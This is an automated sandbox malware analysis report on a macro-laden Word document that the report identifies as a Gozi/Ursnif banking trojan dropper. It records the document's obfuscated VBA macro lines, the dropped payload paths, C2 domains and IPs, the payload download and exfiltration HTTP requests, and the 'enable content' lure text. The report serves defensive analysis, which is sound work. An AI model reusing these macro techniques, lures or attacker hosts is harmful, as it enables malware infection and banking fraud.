Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report e41ZuYVo64.docm

Overview

General Information

Joe Sandbox Version:26.0.0
Analysis ID:820806
Start date:20.03.2019
Start time:16:36:30
Joe Sandbox Product:Cloud
Overall analysis duration:0h 6m 19s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:e41ZuYVo64.docm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:36
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.spre.phis.bank.troj.spyw.expl.evad.winDOCM@39/29@13/5
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 75%
  • Number of executed functions: 81
  • Number of non-executed functions: 228
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .docm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe, OSPPSVC.EXE
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold1000 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid Accounts1Scripting32Hooking1Hooking1Rootkit2Hooking1Process Discovery3Application Deployment SoftwareEmail Collection1Data CompressedStandard Cryptographic Protocol1
Replication Through Removable MediaExploitation for Client Execution23Valid Accounts1Valid Accounts1Masquerading1Credentials in Files1Security Software Discovery431Remote ServicesMan in the Browser1Exfiltration Over Other Network MediumStandard Non-Application Layer Protocol4
Drive-by CompromiseWindows Management InstrumentationRegistry Run Keys / Startup Folder1Process Injection811Valid Accounts1Input CaptureRemote System Discovery1Windows Remote ManagementData from Local System1Automated ExfiltrationStandard Application Layer Protocol114
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingProcess Injection811Credentials in FilesSystem Network Configuration Discovery2Logon ScriptsInput CaptureData EncryptedConnection Proxy1
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessScripting32Account ManipulationSystem Information Discovery215Shared WebrootData StagedScheduled TransferStandard Cryptographic Protocol
Spearphishing AttachmentGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information1Brute ForceSystem Owner/User DiscoveryThird-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port

Signature Overview

Click to jump to signature section


Spreading:

barindex
Performs a network lookup / discovery via net viewShow sources
Source: unknownProcess created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view Jump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413ECF CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,HeapFree,HeapFree,3_2_01413ECF
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00387121 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,16_2_00387121
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003874A1 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,16_2_003874A1
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00391663 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,16_2_00391663

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: text.doc.16147.scr.0.drJump to dropped file
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\text.doc.16147.scrJump to behavior
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: interruption.ru
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.83:49204 -> 31.148.219.163:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.83:49204 -> 31.148.219.163:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.1.83:49206 -> 37.152.176.90:80
Source: TrafficSnort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.1.83:49207 -> 46.139.176.151:80
Found Tor onion addressShow sources
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: .onion/
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrLastTaskLastConfigCrHookOpHookExec.onion/TorClientTorCrc%s %s HTTP/1.1
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: myip.opendns.com
Source: unknownDNS query: name: myip.opendns.com
Uses nslookup.exe to query domainsShow sources
Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1 Jump to behavior
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /free/t32.bin HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: interruption.ru
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /images/logo2.png HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.148.219.163Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /images/Tgxl4eQFLRJ828TTb5/PbE8UHAw2/a53P1QPrTXCRCRA71Ih_/2BBJPZYAZohZ0gbHdmM/JIeRuHUg0_2BloM9tUxzvE/TCq3W9vuEdgKl/IIJpn7iq/nCbHpa_2BOmrGlofqsHXa2m/l7EvsA_2Bv/RUcywXGJJ0g8335L4/wbisH67pflFl/VqPEdPBTaVc/TGPIvkfBJu3_2Fpm/Mu1_2B.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Host: profitsproject.ru
Source: global trafficHTTP traffic detected: POST /images/tGVH9_2Ftdk/sHH41UkampY3Rs/AruAX_2BFORV1KTdlHf40/r6WQws0nBnEhQX03/cynMOwBSQIanvYM/Q4c4COJMjT5QueN5IE/sEKnnjm3Z/aQugH8GJbl7WwfFkU5qM/QNQ84zIsh2Ycx8Z7LQq/5VdFr7kpjPC9bebuaMzXSP/qpLb_2F8n3QIM/JLv3hF1o/uYK3inluwQhgfC5rYmWjZyI/kOeewEdSz/qd.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=382116919742642393088User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Content-Length: 401Host: profitsproject.ru
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /images/logo2.png HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.148.219.163Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /free/t32.bin HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: interruption.ru
Source: global trafficHTTP traffic detected: GET /images/Tgxl4eQFLRJ828TTb5/PbE8UHAw2/a53P1QPrTXCRCRA71Ih_/2BBJPZYAZohZ0gbHdmM/JIeRuHUg0_2BloM9tUxzvE/TCq3W9vuEdgKl/IIJpn7iq/nCbHpa_2BOmrGlofqsHXa2m/l7EvsA_2Bv/RUcywXGJJ0g8335L4/wbisH67pflFl/VqPEdPBTaVc/TGPIvkfBJu3_2Fpm/Mu1_2B.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Host: profitsproject.ru
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: interruption.ru
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /images/tGVH9_2Ftdk/sHH41UkampY3Rs/AruAX_2BFORV1KTdlHf40/r6WQws0nBnEhQX03/cynMOwBSQIanvYM/Q4c4COJMjT5QueN5IE/sEKnnjm3Z/aQugH8GJbl7WwfFkU5qM/QNQ84zIsh2Ycx8Z7LQq/5VdFr7kpjPC9bebuaMzXSP/qpLb_2F8n3QIM/JLv3hF1o/uYK3inluwQhgfC5rYmWjZyI/kOeewEdSz/qd.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=382116919742642393088User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Content-Length: 401Host: profitsproject.ru
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.2Date: Wed, 20 Mar 2019 16:38:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 1573Connection: closeReferrer-Policy: no-referrerData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64
Urls found in memory or binary dataShow sources
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: avicbrkr.exe, 00000010.00000002.1219274895.019B8000.00000004.sdmpString found in binary or memory: http://interruption.ru/free/t32.bin
Source: avicbrkr.exe, 00000010.00000002.1219274895.019B8000.00000004.sdmpString found in binary or memory: http://interruption.ru/free/t64.bin
Source: explorer.exe, 00000005.00000000.1108931725.01CE0000.00000008.sdmpString found in binary or memory: http://www.%s.comPA

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojanShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff16_2_00371C56
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie16_2_00371C56

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Enable Editing, and then click Enable Content. " You are attempting to open a file that was created
Source: Document image extraction number: 0Screenshot OCR: enable content to see this document. " If the file opens in Protected VIew, click Enable Editing, a
Source: Document image extraction number: 1Screenshot OCR: Enable Editing and then click Enable Content ' You are attempting to open a hie that was created in
Source: Document image extraction number: 1Screenshot OCR: enable content to see this document " If the file opens in Protected view, click Enable Editing and
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: e41ZuYVo64.docmOLE, VBA macro line: If Environ("NUMB" + "E" + O84BAz6 + J41vmf7 + We8mB50 + "R_O" + Vx1bX0T + "F" + KL0RGx1 + "_PR" + Xa3i2R0 + "OCE" + Zy6VpOn + "SSORS") < 2 Then GoTo B0476
Source: e41ZuYVo64.docmOLE, VBA macro line: x CStr(Environ("USERPROFILE")) & "\text.doc" & "." & "16147.scr"
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String environ: If Environ("NUMB" + "E" + O84BAz6 + J41vmf7 + We8mB50 + "R_O" + Vx1bX0T + "F" + KL0RGx1 + "_PR" + Xa3i2R0 + "OCE" + Zy6VpOn + "SSORS") < 2 ThenName: Document_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String environ: x CStr(Environ("USERPROFILE")) & "\text.doc" & "." & "16147.scr"Name: Document_Open
Document contains an embedded VBA with functions possibly related to HTTP operationsShow sources
Source: e41ZuYVo64.docmStream path 'VBA/JtuJu' : found possibly 'XMLHttpRequest' functions response, responsebody, open, send
Source: VBA code instrumentationOLE, VBA macro: Module JtuJu, Function I8BD2, found possibly 'XMLHttpRequest' functions response, responsebody, open, sendName: I8BD2
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\text.doc.16147.scrJump to dropped file
Writes or reads registry keys via WMIShow sources
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::GetStringValue
Source: C:\Windows\System32\driverquery.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::GetStringValue
Contains functionality to call native functionsShow sources
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01412A7B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,3_2_01412A7B
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_0141271B NtCreateSection,memset,RtlNtStatusToDosError,NtClose,3_2_0141271B
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413C1B NtQuerySystemInformation,RtlNtStatusToDosError,3_2_01413C1B
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01411C29 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset,3_2_01411C29
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413D34 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_01413D34
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_014126DC NtMapViewOfSection,RtlNtStatusToDosError,3_2_014126DC
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413CF3 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_01413CF3
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413789 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,3_2_01413789
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413CB2 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_01413CB2
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413B27 memset,NtQueryInformationProcess,3_2_01413B27
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413D84 NtGetContextThread,NtGetContextThread,3_2_01413D84
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038A02C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,16_2_0038A02C
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038885B NtQueryInformationProcess,16_2_0038885B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003890AF memset,NtQueryInformationProcess,16_2_003890AF
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038F8C5 GetVersion,NtCreateWaitablePort,NtCreateDirectoryObject,GetLastError,16_2_0038F8C5
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037C3A5 NtLoadKeyEx,memcpy,16_2_0037C3A5
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00386B82 NtCreateWaitablePort,memset,FlushFileBuffers,GetLastError,16_2_00386B82
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038940B NtQuerySystemInformation,RtlNtStatusToDosError,16_2_0038940B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00390D1B memset,NtCancelIoFile,NtCancelIoFile,NtCancelIoFile,NtCancelIoFile,NtCancelIoFile,LocalFree,NtCancelIoFile,16_2_00390D1B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038DE89 NtMapViewOfSection,RtlNtStatusToDosError,16_2_0038DE89
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038DEC8 NtCreateSection,memset,RtlNtStatusToDosError,NtClose,16_2_0038DEC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037DF75 NtUnmapViewOfSection,RtlNtStatusToDosError,HeapFree,16_2_0037DF75
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038CF9B memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset,16_2_0038CF9B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037D7EE memset,CreateMutexA,GetLastError,CloseHandle,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,RtlAllocateHeap,LoadLibraryA,RtlAllocateHeap,wsprintfA,16_2_0037D7EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003A3040 NtProtectVirtualMemory,NtProtectVirtualMemory,16_2_003A3040
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00632A7B NtOpenProcess,NtOpenProcessToken,NtClose,NtClose,16_2_00632A7B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00633B27 memset,NtQueryInformationProcess,16_2_00633B27
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00631C29 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset,16_2_00631C29
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0063271B NtCreateSection,memset,RtlNtStatusToDosError,NtClose,16_2_0063271B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00633C1B NtQuerySystemInformation,RtlNtStatusToDosError,16_2_00633C1B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_006326DC NtMapViewOfSection,RtlNtStatusToDosError,16_2_006326DC
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038D9D6 CreateProcessAsUserA,16_2_0038D9D6
Creates mutexesShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeMutant created: \Sessions\2\BaseNamedObjects\MutexHelper
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeMutant created: \Sessions\2\BaseNamedObjects\{04078505-93E6-D63A-3D78-776AC12C9B3E}
Detected potential crypto functionShow sources
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01414F583_2_01414F58
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038081916_2_00380819
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037F8F816_2_0037F8F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00374A2716_2_00374A27
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00383C1916_2_00383C19
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038440316_2_00384403
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00395C4C16_2_00395C4C
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003824E616_2_003824E6
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037FCC416_2_0037FCC4
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00384CC316_2_00384CC3
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037E76416_2_0037E764
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00634F5816_2_00634F58
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: e41ZuYVo64.docmOLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Document contains embedded VBA macrosShow sources
Source: e41ZuYVo64.docmOLE indicator, VBA macros: true
Document contains no OLE stream with summary informationShow sources
Source: e41ZuYVo64.docmOLE indicator has summary info: false
Document has an unknown application nameShow sources
Source: e41ZuYVo64.docmOLE indicator application name: unknown
Document misses a certain OLE stream usually present in this Microsoft Office document typeShow sources
Source: e41ZuYVo64.docmOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Reads the hosts fileShow sources
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)Show sources
Source: 152E.bin1.13.drBinary string: Boot Device: \Device\HarddiskVolume1
Classification labelShow sources
Source: classification engineClassification label: mal100.spre.phis.bank.troj.spyw.expl.evad.winDOCM@39/29@13/5
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037B652 CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,Thread32Next,16_2_0037B652
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$1ZuYVo64.docmJump to behavior
Creates temporary filesShow sources
